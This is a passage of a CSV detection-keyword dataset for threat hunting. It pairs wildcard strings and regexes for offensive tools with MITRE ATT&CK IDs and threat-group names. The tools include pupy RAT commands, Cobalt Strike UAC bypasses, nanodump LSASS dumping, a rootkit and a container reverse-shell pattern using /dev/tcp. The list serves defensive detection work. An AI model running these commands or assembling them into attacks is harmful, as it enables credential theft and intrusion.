TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57651" "*ruler-win86.exe*",".{0,1000}ruler\-win86\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57652" "*rules/d3ad0ne.rule*",".{0,1000}rules\/d3ad0ne\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57653" "*run * pyshell*",".{0,1000}run\s.{0,1000}\spyshell.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57654" "*run android_cam *",".{0,1000}run\sandroid_cam\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - 
T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57655" "*run --bg shell_exec*",".{0,1000}run\s\-\-bg\sshell_exec.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57656" "*run DNSStager as root*",".{0,1000}run\sDNSStager\sas\sroot.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","Black Basta","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","N/A","10","7","613","133","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z","57657" "*run -Executable 
*.exe*",".{0,1000}run\s\-Executable\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","57658" "*run interactive_shell*",".{0,1000}run\sinteractive_shell.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57659" "*run keylogger*",".{0,1000}run\skeylogger.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57660" "*run memory_exec *.*",".{0,1000}run\smemory_exec\s.{0,1000}\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57661" "*run mount-cgroup ""sh -i * /dev/tcp/*",".{0,1000}run\smount\-cgroup\s\""sh\s\-i\s.{0,1000}\s\/dev\/tcp\/.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","57662" "*run mouselogger*",".{0,1000}run\smouselogger.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - 
T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57663" "*run post/windows/gather/checkvm*",".{0,1000}run\spost\/windows\/gather\/checkvm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57664" "*run post/windows/manage/killfw*",".{0,1000}run\spost\/windows\/manage\/killfw.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57665" "*run post/windows/manage/migrate*",".{0,1000}run\spost\/windows\/manage\/migrate.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR 
- Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","57666" "*run pyexec *",".{0,1000}run\spyexec\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57667" "*run --rm -it xshuden/cheetah*",".{0,1000}run\s\-\-rm\s\-it\sxshuden\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","57668" "*run shell_exec *",".{0,1000}run\sshell_exec\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - 
T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57669" "*run shellcode_exec*",".{0,1000}run\sshellcode_exec.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57670" "*Run the krbscm method for SYSTEM shell*",".{0,1000}Run\sthe\skrbscm\smethod\sfor\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57671" "*run thief:latest*",".{0,1000}run\sthief\:latest.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - 
T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","57672" "*Run WCE indefinitely, waiting for new credentials/logon sessions*",".{0,1000}Run\sWCE\sindefinitely,\swaiting\sfor\snew\scredentials\/logon\ssessions.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","57673" "*run_kmod.sh netkit.ko netkit*",".{0,1000}run_kmod\.sh\snetkit\.ko\snetkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","57674" "*run_ppl_dump_exploit*",".{0,1000}run_ppl_dump_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57675" "*run_ppl_medic_exploit*",".{0,1000}run_ppl_medic_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","57676" "*run_python.sh client/shell.py*",".{0,1000}run_python\.sh\sclient\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#linux","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","57677" "*run_server.bat",".{0,1000}run_server\.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","57678" "*runasadmin uac-cmstplua*",".{0,1000}runasadmin\suac\-cmstplua.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57679" "*runasadmin uac-token-duplication*",".{0,1000}runasadmin\suac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57680" "*RunasCreateProcessAsUserW*",".{0,1000}RunasCreateProcessAsUserW.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57681" "*RunasCs v1.5 - @splinter_code*",".{0,1000}RunasCs\sv1\.5\s\-\s\@splinter_code.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57682" "*RunasCs v1.5 - @splinter_code*",".{0,1000}RunasCs\sv1\.5\s\-\s\@splinter_code.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows 
Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57683" "*RunasCs* --remote-impersonation*",".{0,1000}RunasCs.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","RunasCs","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","57685" "*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57686" "*RunasCs.zip*",".{0,1000}RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57687" "*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin 
runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","57688" "*runas-netonly *",".{0,1000}runas\-netonly\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57689" "*runasppl_check*",".{0,1000}runasppl_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57690" "*RunAsWinTcb.exe*",".{0,1000}RunAsWinTcb\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses a userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","57691" 
"*RunAsWinTcb-master*",".{0,1000}RunAsWinTcb\-master.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses a userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","57692" "*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCleanup\-77740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57693" "*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCodeExec\-75740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","57694" "*run-dll SharpSploit*",".{0,1000}run\-dll\sSharpSploit.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 
